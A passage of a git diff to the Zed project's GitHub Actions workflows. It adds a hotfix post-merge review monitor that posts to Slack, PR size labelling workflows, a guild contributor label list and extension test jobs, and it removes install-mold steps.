HEAD -- "$WORKFLOW_DIR" | \ - awk '/^D/ { print $2 } /^R/ { print $2 }' | \ - xargs -I{} basename {} 2>/dev/null | \ - tr '\n' ' ' || echo "") - - REMOVED_FILES=$(echo "$REMOVED_FILES" | xargs) - - echo "Files to remove: $REMOVED_FILES" - echo "removed_files=$REMOVED_FILES" >> "$GITHUB_OUTPUT" - env: - PREV_COMMIT: ${{ steps.prev-tag.outputs.prev_commit }} - MATRIX_REPO: ${{ matrix.repo }} - working-directory: zed - - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files - run: | - mkdir -p extension/.github/workflows cd extension/.github/workflows if [ -n "$REMOVED_FILES" ]; 
then @@ -119,18 +159,18 @@ jobs: cd - > /dev/null if [ "$MATRIX_REPO" = "workflows" ]; then - cp zed/extensions/workflows/*.yml extension/.github/workflows/ + cp workflow-files/*.yml extension/.github/workflows/ else - cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/ + cp workflow-files/shared/*.yml extension/.github/workflows/ fi env: - REMOVED_FILES: ${{ steps.calc-changes.outputs.removed_files }} + REMOVED_CI: ${{ needs.fetch_extension_repos.outputs.removed_ci }} + REMOVED_SHARED: ${{ needs.fetch_extension_repos.outputs.removed_shared }} MATRIX_REPO: ${{ matrix.repo }} - id: short-sha name: extension_workflow_rollout::rollout_workflows_to_extension::get_short_sha run: | - echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT" - working-directory: zed + echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT" - id: create-pr name: extension_workflow_rollout::rollout_workflows_to_extension::create_pull_request uses: peter-evans/create-pull-request@v7 @@ -140,6 +180,8 @@ jobs: body: | This PR updates the CI workflow files from the main Zed repository based on the commit zed-industries/zed@${{ github.sha }} + + ${{ inputs.change-description }} commit-message: Update CI workflows to `${{ steps.short-sha.outputs.sha_short }}` branch: update-workflows committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com> @@ -151,16 +193,17 @@ jobs: - name: extension_workflow_rollout::rollout_workflows_to_extension::enable_auto_merge run: | if [ -n "$PR_NUMBER" ]; then - cd extension gh pr merge "$PR_NUMBER" --auto --squash fi env: GH_TOKEN: ${{ steps.generate-token.outputs.token }} PR_NUMBER: ${{ steps.create-pr.outputs.pull-request-number }} + working-directory: extension timeout-minutes: 10 create_rollout_tag: needs: - rollout_workflows_to_extension + if: inputs.filter-repos == '' runs-on: namespace-profile-2x4-ubuntu-2404 steps: - id: generate-token diff --git a/.github/workflows/hotfix-review-monitor.yml 
b/.github/workflows/hotfix-review-monitor.yml new file mode 100644 index 0000000000000000000000000000000000000000..760cd9806c9928d784de1b69ed97c86148ae6fc1 --- /dev/null +++ b/.github/workflows/hotfix-review-monitor.yml @@ -0,0 +1,114 @@ +# Hotfix Review Monitor +# +# Runs daily and checks for merged PRs with the 'hotfix' label that have not +# received a post-merge review approval within one business day. Posts a summary to +# Slack if any are found. This is a SOC2 compensating control for the +# emergency hotfix fast path. +# +# Security note: No untrusted input (PR titles, bodies, etc.) is interpolated +# into shell commands. All PR metadata is read via gh API + jq, not via +# github.event context expressions. +# +# Required secrets: +# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel + +name: Hotfix Review Monitor + +on: + schedule: + - cron: "30 13 * * 1-5" # 1:30 PM UTC weekdays + workflow_dispatch: {} + +permissions: + contents: read + pull-requests: read + +jobs: + check-hotfix-reviews: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + env: + REPO: ${{ github.repository }} + steps: + - name: Find unreviewed hotfixes + id: check + env: + GH_TOKEN: ${{ secrets.GITHUB_TOKEN }} + run: | + # 80h lookback covers the Friday-to-Monday gap (72h) with buffer. + # Overlap on weekdays is harmless — reviewed PRs are filtered out below. + SINCE=$(date -u -v-80H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \ + || date -u -d '80 hours ago' +%Y-%m-%dT%H:%M:%SZ) + SINCE_DATE=$(echo "$SINCE" | cut -dT -f1) + + # Use the Search API to find hotfix PRs merged in the lookback window. + # The Pulls API with state=closed paginates through all closed PRs in + # the repo, which times out on large repos. The Search API supports + # merged:>DATE natively so GitHub does the filtering server-side. 
+          gh api --paginate \
+            "search/issues?q=repo:${REPO}+is:pr+is:merged+label:hotfix+merged:>${SINCE_DATE}&per_page=100" \
+            --jq '[.items[] | {number, title, merged_at: .pull_request.merged_at}]' \
+            > /tmp/hotfix_prs.json
+
+          # Check each hotfix PR for a post-merge approving review
+          jq -r '.[].number' /tmp/hotfix_prs.json | while read -r PR_NUMBER; do
+            APPROVALS=$(gh api \
+              "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \
+              --jq "[.[] | select(.state == \"APPROVED\")] | length")
+
+            if [ "$APPROVALS" -eq 0 ]; then
+              jq ".[] | select(.number == ${PR_NUMBER})" /tmp/hotfix_prs.json
+            fi
+          done | jq -s '.' > /tmp/unreviewed.json
+
+          COUNT=$(jq 'length' /tmp/unreviewed.json)
+          echo "count=$COUNT" >> "$GITHUB_OUTPUT"
+
+      - name: Notify Slack
+        if: steps.check.outputs.count != '0'
+        env:
+          SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }}
+          COUNT: ${{ steps.check.outputs.count }}
+        run: |
+          # Build Block Kit payload from JSON — no shell interpolation of PR titles.
+          # Why jq? PR titles are attacker-controllable input. By reading them
+          # through jq -r from the JSON file and passing the result to jq --arg,
+          # the content stays safely JSON-encoded in the final payload. Block Kit
+          # doesn't change this — the same jq pipeline feeds into the blocks
+          # structure instead of plain text.
+          PRS=$(jq -r --arg repo "$REPO" '.[] | "• <https://github.com/\($repo)/pull/\(.number)|#\(.number)> — \(.title) (merged \(.merged_at | split("T")[0]))"' /tmp/unreviewed.json)
+
+          jq -n \
+            --arg count "$COUNT" \
+            --arg prs "$PRS" \
+            '{
+              text: ($count + " hotfix PR(s) still need post-merge review"),
+              blocks: [
+                {
+                  type: "section",
+                  text: {
+                    type: "mrkdwn",
+                    text: (":rotating_light: *" + $count + " Hotfix PR(s) Need Post-Merge Review*")
+                  }
+                },
+                {
+                  type: "section",
+                  text: { type: "mrkdwn", text: $prs }
+                },
+                { type: "divider" },
+                {
+                  type: "context",
+                  elements: [{
+                    type: "mrkdwn",
+                    text: "Hotfix PRs require review within one business day of merge."
+ }] + } + ] + }' | \ + curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \ + -H 'Content-Type: application/json' \ + -d @- +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/pr-size-check.yml b/.github/workflows/pr-size-check.yml new file mode 100644 index 0000000000000000000000000000000000000000..6cbed314e012c66da16fd016dd9b3cdcf9788149 --- /dev/null +++ b/.github/workflows/pr-size-check.yml @@ -0,0 +1,109 @@ +# PR Size Check — Compute +# +# Calculates PR size and saves the result as an artifact. A companion +# workflow (pr-size-label.yml) picks up the artifact via workflow_run +# and applies labels + comments with write permissions. +# +# This two-workflow split is required because fork PRs receive a +# read-only GITHUB_TOKEN. The compute step needs no write access; +# the label/comment step runs via workflow_run on the base repo with +# full write permissions. +# +# Security note: This workflow only reads PR file data via the JS API +# and writes a JSON artifact. No untrusted input is interpolated into +# shell commands. 
+ +name: PR Size Check + +on: + pull_request: + types: [opened, synchronize] + +permissions: + contents: read + pull-requests: read + +jobs: + compute-size: + if: github.repository_owner == 'zed-industries' + runs-on: ubuntu-latest + timeout-minutes: 5 + steps: + - name: Calculate PR size + uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0 + with: + script: | + const fs = require('fs'); + + const { data: files } = await github.rest.pulls.listFiles({ + owner: context.repo.owner, + repo: context.repo.repo, + pull_number: context.issue.number, + per_page: 300, + }); + + // Sum additions + deletions, excluding generated/lock files + const IGNORED_PATTERNS = [ + /\.lock$/, + /^Cargo\.lock$/, + /pnpm-lock\.yaml$/, + /\.generated\./, + /\/fixtures\//, + /\/snapshots\//, + ]; + + let totalChanges = 0; + for (const file of files) { + const ignored = IGNORED_PATTERNS.some(p => p.test(file.filename)); + if (!ignored) { + totalChanges += file.additions + file.deletions; + } + } + + // Assign size bracket + const SIZE_BRACKETS = [ + ['Size S', 0, 100, '0e8a16'], + ['Size M', 100, 400, 'fbca04'], + ['Size L', 400, 800, 'e99695'], + ['Size XL', 800, Infinity, 'b60205'], + ]; + + let sizeLabel = 'Size S'; + let labelColor = '0e8a16'; + for (const [label, min, max, color] of SIZE_BRACKETS) { + if (totalChanges >= min && totalChanges < max) { + sizeLabel = label; + labelColor = color; + break; + } + } + + // Check if the author wrote content in the "How to Review" section. + const rawBody = context.payload.pull_request.body || ''; + const howToReview = rawBody.match(/## How to Review\s*\n([\s\S]*?)(?=\n## |$)/i); + const hasReviewGuidance = howToReview + ? 
howToReview[1].replace(/<!--[\s\S]*?-->/g, '').trim().length > 0
+              : false;
+
+            const result = {
+              pr_number: context.issue.number,
+              total_changes: totalChanges,
+              size_label: sizeLabel,
+              label_color: labelColor,
+              has_review_guidance: hasReviewGuidance,
+            };
+
+            console.log(`PR #${result.pr_number}: ${totalChanges} LOC, ${sizeLabel}`);
+
+            fs.mkdirSync('pr-size', { recursive: true });
+            fs.writeFileSync('pr-size/result.json', JSON.stringify(result));
+
+      - name: Upload size result
+        uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
+        with:
+          name: pr-size-result
+          path: pr-size/
+          retention-days: 1
+defaults:
+  run:
+    shell: bash -euxo pipefail {0}
diff --git a/.github/workflows/pr-size-label.yml b/.github/workflows/pr-size-label.yml
new file mode 100644
index 0000000000000000000000000000000000000000..599daf122aac728c469acd45da865e1079c07fb6
--- /dev/null
+++ b/.github/workflows/pr-size-label.yml
@@ -0,0 +1,195 @@
+# PR Size Check — Label & Comment
+#
+# Triggered by workflow_run after pr-size-check.yml completes.
+# Downloads the size result artifact and applies labels + comments.
+#
+# This runs on the base repo with full GITHUB_TOKEN write access,
+# so it works for both same-repo and fork PRs.
+#
+# Security note: The artifact is treated as untrusted data — only
+# structured JSON fields (PR number, size label, color, boolean) are
+# read. No artifact content is executed or interpolated into shell.
+ +name: PR Size Label + +on: + workflow_run: + workflows: ["PR Size Check"] + types: [completed] + +jobs: + apply-labels: + if: > + github.repository_owner == 'zed-industries' && + github.event.workflow_run.conclusion == 'success' + permissions: + contents: read + pull-requests: write + issues: write + runs-on: ubuntu-latest + timeout-minutes: 5 + steps: + - name: Download size result artifact + id: download + uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0 + with: + script: | + const fs = require('fs'); + const path = require('path'); + + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + const match = allArtifacts.data.artifacts.find(a => a.name === 'pr-size-result'); + if (!match) { + console.log('No pr-size-result artifact found, skipping'); + core.setOutput('found', 'false'); + return; + } + + const download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: match.id, + archive_format: 'zip', + }); + + const temp = path.join(process.env.RUNNER_TEMP, 'pr-size'); + fs.mkdirSync(temp, { recursive: true }); + fs.writeFileSync(path.join(temp, 'result.zip'), Buffer.from(download.data)); + core.setOutput('found', 'true'); + + - name: Unzip artifact + if: steps.download.outputs.found == 'true' + env: + ARTIFACT_DIR: ${{ runner.temp }}/pr-size + run: unzip "$ARTIFACT_DIR/result.zip" -d "$ARTIFACT_DIR" + + - name: Apply labels and comment + if: steps.download.outputs.found == 'true' + uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0 + with: + script: | + const fs = require('fs'); + const path = require('path'); + + const temp = path.join(process.env.RUNNER_TEMP, 'pr-size'); + const resultPath = path.join(temp, 'result.json'); + if (!fs.existsSync(resultPath)) { + console.log('No result.json found, skipping'); + 
return; + } + + const result = JSON.parse(fs.readFileSync(resultPath, 'utf8')); + + // Validate artifact data (treat as untrusted) + const prNumber = Number(result.pr_number); + const totalChanges = Number(result.total_changes); + const sizeLabel = String(result.size_label); + const labelColor = String(result.label_color); + const hasReviewGuidance = Boolean(result.has_review_guidance); + + if (!prNumber || !sizeLabel.startsWith('Size ')) { + core.setFailed(`Invalid artifact data: pr=${prNumber}, label=${sizeLabel}`); + return; + } + + console.log(`PR #${prNumber}: ${totalChanges} LOC, ${sizeLabel}`); + + // --- Size label (idempotent) --- + const existingLabels = (await github.rest.issues.listLabelsOnIssue({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + })).data.map(l => l.name); + + const existingSizeLabels = existingLabels.filter(l => l.startsWith('Size ')); + const alreadyCorrect = existingSizeLabels.length === 1 && existingSizeLabels[0] === sizeLabel; + + if (!alreadyCorrect) { + for (const label of existingSizeLabels) { + await github.rest.issues.removeLabel({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + name: label, + }); + } + + try { + await github.rest.issues.createLabel({ + owner: context.repo.owner, + repo: context.repo.repo, + name: sizeLabel, + color: labelColor, + }); + } catch (e) { + if (e.status !== 422) throw e; + } + + await github.rest.issues.addLabels({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: prNumber, + labels: [sizeLabel], + }); + } + + // --- Large PR handling (400+ LOC) --- + if (totalChanges >= 400) { + if (!existingLabels.includes('large-pr')) { + try { + await github.rest.issues.createLabel({ + owner: context.repo.owner, + repo: context.repo.repo, + name: 'large-pr', + color: 'e99695', + }); + } catch (e) { + if (e.status !== 422) throw e; + } + + await github.rest.issues.addLabels({ + owner: context.repo.owner, + repo: 
context.repo.repo,
+                issue_number: prNumber,
+                labels: ['large-pr'],
+              });
+            }
+
+            // Comment once with guidance
+            const MARKER = '<!-- pr-size-check -->';
+            const { data: comments } = await github.rest.issues.listComments({
+              owner: context.repo.owner,
+              repo: context.repo.repo,
+              issue_number: prNumber,
+            });
+
+            const alreadyCommented = comments.some(c => c.body.includes(MARKER));
+            if (!alreadyCommented) {
+              let body = `${MARKER}\n`;
+              body += `### :straight_ruler: PR Size: **${totalChanges} lines changed** (${sizeLabel})\n\n`;
+              body += `Please note: this PR exceeds the 400 LOC soft limit.\n`;
+              body += `- Consider **splitting** into separate PRs if the changes are separable\n`;
+              body += `- Ensure the PR description includes a **guided tour** in the "How to Review" section so reviewers know where to start\n`;
+
+              if (hasReviewGuidance) {
+                body += `\n:white_check_mark: "How to Review" section appears to include guidance — thank you!\n`;
+              }
+
+              await github.rest.issues.createComment({
+                owner: context.repo.owner,
+                repo: context.repo.repo,
+                issue_number: prNumber,
+                body: body,
+              });
+            }
+          }
+
+          console.log(`PR #${prNumber}: labeled ${sizeLabel}, done`);
+defaults:
+  run:
+    shell: bash -euxo pipefail {0}
diff --git a/.github/workflows/pr_labeler.yml b/.github/workflows/pr_labeler.yml
index cc9c4a9eefd4aa75ba69fb18b353efa6a32778c5..4a1f9c474c6d00bec137bbfb58ba78acb15440d1 100644
--- a/.github/workflows/pr_labeler.yml
+++ b/.github/workflows/pr_labeler.yml
@@ -1,5 +1,6 @@
 # Labels pull requests by author: 'bot' for bot accounts, 'staff' for
-# staff team members, 'first contribution' for first-time external contributors.
+# staff team members, 'guild' for guild members, 'first contribution' for
+# first-time external contributors.
name: PR Labeler on: @@ -29,8 +30,50 @@ jobs: script: | const BOT_LABEL = 'bot'; const STAFF_LABEL = 'staff'; + const GUILD_LABEL = 'guild'; const FIRST_CONTRIBUTION_LABEL = 'first contribution'; const STAFF_TEAM_SLUG = 'staff'; + const GUILD_MEMBERS = [ + '11happy', + 'AidanV', + 'AmaanBilwar', + 'OmChillure', + 'Palanikannan1437', + 'Shivansh-25', + 'SkandaBhat', + 'TwistingTwists', + 'YEDASAVG', + 'Ziqi-Yang', + 'alanpjohn', + 'arjunkomath', + 'austincummings', + 'ayushk-1801', + 'claiwe', + 'criticic', + 'dongdong867', + 'emamulandalib', + 'eureka928', + 'feitreim', + 'iam-liam', + 'iksuddle', + 'ishaksebsib', + 'lingyaochu', + 'loadingalias', + 'marcocondrache', + 'mchisolm0', + 'mostlyKIGuess', + 'nairadithya', + 'nihalxkumar', + 'notJoon', + 'polyesterswing', + 'prayanshchh', + 'razeghi71', + 'sarmadgulzar', + 'seanstrom', + 'th0jensen', + 'tommyming', + 'virajbhartiya', + ]; const pr = context.payload.pull_request; const author = pr.user.login; @@ -71,6 +114,17 @@ jobs: return; } + if (GUILD_MEMBERS.includes(author)) { + await github.rest.issues.addLabels({ + owner: context.repo.owner, + repo: context.repo.repo, + issue_number: pr.number, + labels: [GUILD_LABEL] + }); + console.log(`PR #${pr.number} by ${author}: labeled '${GUILD_LABEL}' (guild member)`); + // No early return: guild members can also get 'first contribution' + } + // We use inverted logic here due to a suspected GitHub bug where first-time contributors // get 'NONE' instead of 'FIRST_TIME_CONTRIBUTOR' or 'FIRST_TIMER'. 
// https://github.com/orgs/community/discussions/78038 diff --git a/.github/workflows/release.yml b/.github/workflows/release.yml index 8adad5cfba278dc68dd227b86455510278c7a1ae..07a0a6d672a0a66c9c1609e82a22af9034dc936e 100644 --- a/.github/workflows/release.yml +++ b/.github/workflows/release.yml @@ -72,8 +72,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_node @@ -199,8 +197,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -318,8 +314,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -360,8 +354,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux diff --git a/.github/workflows/release_nightly.yml b/.github/workflows/release_nightly.yml index 46d8732b08ea658275e1fb21117a09b9e0668933..093a17e8760e52fc4278d56dd6144b6a0432f3c5 100644 --- a/.github/workflows/release_nightly.yml +++ b/.github/workflows/release_nightly.yml @@ -122,8 +122,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -170,8 +168,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - 
run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux diff --git a/.github/workflows/run_agent_evals.yml b/.github/workflows/run_agent_evals.yml index c506039ce7c1863bd3c60091beb78d5239110bbd..56cbd17a197200a6764ed1e28c87e90740cd7deb 100644 --- a/.github/workflows/run_agent_evals.yml +++ b/.github/workflows/run_agent_evals.yml @@ -34,8 +34,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_cargo_config diff --git a/.github/workflows/run_bundling.yml b/.github/workflows/run_bundling.yml index 7cb1665f9d0bd4fe3b0f3c05527bf39aab5f610a..5a93cf074e2a2d7f2f3cf8418ed508c5ad359d9e 100644 --- a/.github/workflows/run_bundling.yml +++ b/.github/workflows/run_bundling.yml @@ -32,8 +32,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux @@ -73,8 +71,6 @@ jobs: token: ${{ secrets.SENTRY_AUTH_TOKEN }} - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/bundle-linux diff --git a/.github/workflows/run_cron_unit_evals.yml b/.github/workflows/run_cron_unit_evals.yml index 2a204a9d40d78bf52f38825b4db060216e348a87..6af46e678d3d629cc2f7973b8b31ee99477dfefc 100644 --- a/.github/workflows/run_cron_unit_evals.yml +++ b/.github/workflows/run_cron_unit_evals.yml @@ -35,8 +35,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest diff --git 
a/.github/workflows/run_tests.yml b/.github/workflows/run_tests.yml index 00d69639a53868386157e67aeab5ce7383d32426..1906acf9fab7bbaab81b0549328c2e85d732756d 100644 --- a/.github/workflows/run_tests.yml +++ b/.github/workflows/run_tests.yml @@ -103,13 +103,22 @@ jobs: check_pattern "run_action_checks" '^\.github/(workflows/|actions/|actionlint.yml)|tooling/xtask|script/' -qP check_pattern "run_docs" '^(docs/|crates/.*\.rs)' -qP check_pattern "run_licenses" '^(Cargo.lock|script/.*licenses)' -qP - check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))' -qvP + check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)' -qvP + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi + echo "changed_extensions=$EXTENSIONS_JSON" >> "$GITHUB_OUTPUT" outputs: changed_packages: ${{ steps.filter.outputs.changed_packages }} run_action_checks: ${{ steps.filter.outputs.run_action_checks }} run_docs: ${{ steps.filter.outputs.run_docs }} run_licenses: ${{ steps.filter.outputs.run_licenses }} run_tests: ${{ steps.filter.outputs.run_tests }} + changed_extensions: ${{ steps.filter.outputs.changed_extensions }} check_style: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') runs-on: namespace-profile-4x8-ubuntu-2204 @@ -147,8 +156,8 @@ jobs: file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz - name: run_tests::run_ts_query_ls run: |- - tar -xf ts_query_ls-x86_64-unknown-linux-gnu.tar.gz - ./ts_query_ls format --check . 
|| { + tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || { echo "Found unformatted queries, please format them with ts_query_ls." echo "For easy use, install the Tree-sitter query extension:" echo "zed://extension/tree-sitter-query" @@ -209,8 +218,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -256,6 +263,39 @@ jobs: - name: steps::show_sccache_stats run: sccache --show-stats || true timeout-minutes: 60 + clippy_mac_x86_64: + needs: + - orchestrate + if: needs.orchestrate.outputs.run_tests == 'true' + runs-on: namespace-profile-mac-large + steps: + - name: steps::checkout_repo + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + with: + clean: false + - name: steps::setup_cargo_config + run: | + mkdir -p ./../.cargo + cp ./.cargo/ci-config.toml ./../.cargo/config.toml + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@v1 + with: + cache: rust + path: ~/.rustup + - name: steps::install_rustup_target + run: rustup target add x86_64-apple-darwin + - name: steps::setup_sccache + run: ./script/setup-sccache + env: + R2_ACCOUNT_ID: ${{ secrets.R2_ACCOUNT_ID }} + R2_ACCESS_KEY_ID: ${{ secrets.R2_ACCESS_KEY_ID }} + R2_SECRET_ACCESS_KEY: ${{ secrets.R2_SECRET_ACCESS_KEY }} + SCCACHE_BUCKET: sccache-zed + - name: steps::clippy + run: ./script/clippy --target x86_64-apple-darwin + - name: steps::show_sccache_stats + run: sccache --show-stats || true + timeout-minutes: 60 run_tests_windows: needs: - orchestrate @@ -322,8 +362,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: 
steps::setup_node @@ -421,8 +459,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_cargo_config @@ -471,8 +507,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_sccache @@ -597,8 +631,6 @@ jobs: jobSummary: false - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: ./script/generate-action-metadata @@ -711,6 +743,20 @@ jobs: - name: run_tests::check_postgres_and_protobuf_migrations::check_protobuf_formatting run: buf format --diff --exit-code crates/proto/proto timeout-minutes: 60 + extension_tests: + needs: + - orchestrate + if: needs.orchestrate.outputs.changed_extensions != '[]' + permissions: + contents: read + strategy: + matrix: + extension: ${{ fromJson(needs.orchestrate.outputs.changed_extensions) }} + fail-fast: false + max-parallel: 1 + uses: ./.github/workflows/extension_tests.yml + with: + working-directory: ${{ matrix.extension }} tests_pass: needs: - orchestrate @@ -718,6 +764,7 @@ jobs: - clippy_windows - clippy_linux - clippy_mac + - clippy_mac_x86_64 - run_tests_windows - run_tests_linux - run_tests_mac @@ -728,6 +775,7 @@ jobs: - check_docs - check_licenses - check_scripts + - extension_tests if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && always() runs-on: namespace-profile-2x4-ubuntu-2404 steps: @@ -746,6 +794,7 @@ jobs: check_result "clippy_windows" "$RESULT_CLIPPY_WINDOWS" check_result "clippy_linux" "$RESULT_CLIPPY_LINUX" check_result "clippy_mac" "$RESULT_CLIPPY_MAC" + check_result "clippy_mac_x86_64" "$RESULT_CLIPPY_MAC_X86_64" 
check_result "run_tests_windows" "$RESULT_RUN_TESTS_WINDOWS" check_result "run_tests_linux" "$RESULT_RUN_TESTS_LINUX" check_result "run_tests_mac" "$RESULT_RUN_TESTS_MAC" @@ -756,6 +805,7 @@ jobs: check_result "check_docs" "$RESULT_CHECK_DOCS" check_result "check_licenses" "$RESULT_CHECK_LICENSES" check_result "check_scripts" "$RESULT_CHECK_SCRIPTS" + check_result "extension_tests" "$RESULT_EXTENSION_TESTS" exit $EXIT_CODE env: @@ -764,6 +814,7 @@ jobs: RESULT_CLIPPY_WINDOWS: ${{ needs.clippy_windows.result }} RESULT_CLIPPY_LINUX: ${{ needs.clippy_linux.result }} RESULT_CLIPPY_MAC: ${{ needs.clippy_mac.result }} + RESULT_CLIPPY_MAC_X86_64: ${{ needs.clippy_mac_x86_64.result }} RESULT_RUN_TESTS_WINDOWS: ${{ needs.run_tests_windows.result }} RESULT_RUN_TESTS_LINUX: ${{ needs.run_tests_linux.result }} RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }} @@ -774,6 +825,7 @@ jobs: RESULT_CHECK_DOCS: ${{ needs.check_docs.result }} RESULT_CHECK_LICENSES: ${{ needs.check_licenses.result }} RESULT_CHECK_SCRIPTS: ${{ needs.check_scripts.result }} + RESULT_EXTENSION_TESTS: ${{ needs.extension_tests.result }} concurrency: group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} cancel-in-progress: true diff --git a/.github/workflows/run_unit_evals.yml b/.github/workflows/run_unit_evals.yml index 2259d2498b76f3627e6784f55023e2fbfe855cbb..44f12a1886bdac2fa1da8c870d223dd358285658 100644 --- a/.github/workflows/run_unit_evals.yml +++ b/.github/workflows/run_unit_evals.yml @@ -38,8 +38,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest diff --git a/.github/workflows/stale-pr-reminder.yml b/.github/workflows/stale-pr-reminder.yml new file mode 100644 index 0000000000000000000000000000000000000000..1c3c0aec623c68c3c99803ef2421e73dbec9cf8e --- 
